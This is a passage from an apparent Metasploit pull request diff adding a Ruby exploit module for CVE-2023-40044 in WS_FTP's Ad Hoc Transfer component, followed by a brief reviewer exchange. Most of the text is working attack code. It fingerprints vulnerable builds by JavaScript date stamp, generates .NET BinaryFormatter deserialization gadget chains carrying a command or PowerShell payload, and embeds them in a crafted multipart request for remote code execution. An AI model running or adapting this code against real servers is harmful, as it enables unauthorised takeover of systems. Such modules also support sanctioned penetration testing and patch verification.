modules/exploits/windows/http/ws_ftp_rce_cve_2023_40044.rb

```diff
@@ -0,0 +1,175 @@
+      ]
+    )
+  end
+
+  def check
+    # As the vulnerability lies in the WS_FTP Ad Hoc Transfer (AHT) module, we query the index HTML file for AHT.
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri' => '/AHT/AHT_UI/public/index.html'
+    )
+
+    return CheckCode::Unknown('Connection failed') unless res
+
+    title = Nokogiri::HTML(res.body).xpath('//head/title')&.text
+
+    # We verify the target is running the AHT module, by inspecting the HTML heads title.
+    if title == 'Ad Hoc Transfer'
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri' => '/AHT/AHT_UI/public/js/app.min.js'
+      )
+
+      return CheckCode::Unknown('Connection failed') unless res
+
+      # The patched versions were released on September 2023. We can query the date stamp in the app.min.js file
+      # to see when this file was built. If it is before Sept 2023, then we have a vulnerable version of WS_FTP,
+      # but if it was build on Sept 2023 or after, it is not vulnerable.
+
+      if res.code == 200 && res.body =~ %r{/\*! fileTransfer (\d+)-(\d+)-(\d+) \*/}
+        day = ::Regexp.last_match(1).to_i
+        month = ::Regexp.last_match(2).to_i
+        year = ::Regexp.last_match(3).to_i
+
+        description = "Detected a build date of #{day}-#{month}-#{year}"
+
+        if year > 2023 || (year == 2023 && month >= 9)
+          return CheckCode::Safe(description)
+        end
+
+        return CheckCode::Appears(description)
+      end
+
+      # If we couldn't get the JS build date, we at least know the target is WS_FTP with the Ad Hoc Transfer module.
+      return CheckCode::Detected
+    end
+
+    CheckCode::Unknown
+  end
+
+  def exploit
+    unless datastore['TARGET_URI'].start_with? '/AHT/'
+      fail_with(Failure::BadConfig, 'The TARGET_URI must begin with /AHT/')
+    end
+
+    case target['Type']
+    when :windows_command
+      execute_command(payload.encoded)
+    when :windows_powershell
+      execute_command(cmd_psh_payload(payload.encoded, payload.arch.first, remove_comspec: true))
+    end
+  end
+
+  def execute_command(cmd)
+    # All of these gadget chains will work. We pick a random one during exploitation.
+    chains = %i[ClaimsPrincipal TypeConfuseDelegate TextFormattingRunProperties]
+
+    gadget = ::Msf::Util::DotNetDeserialization.generate(
+      cmd,
+      gadget_chain: chains.sample,
+      formatter: :BinaryFormatter
+    )
+
+    # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation.
+    tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER]
+
+    boundary = rand_text_alphanumeric(8)
+
+    data = "--#{boundary}\r\n"
+    data << "name: #{rand_text_alphanumeric(8)}\r\n"
+    data << "\r\n"
+    data << "::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n"
+    data << "--#{boundary}–\r\n"
+    data << "\r\n"
```

Comment:
Can this be updated to use the [rex-mime](https://github.com/rapid7/rex-mime) API?

Reply:
Implemented in [8431d11](https://github.com/rapid7/metasploit-framework/pull/18414/commits/8431d116546aa01279b4ab212bc2928497370eb9)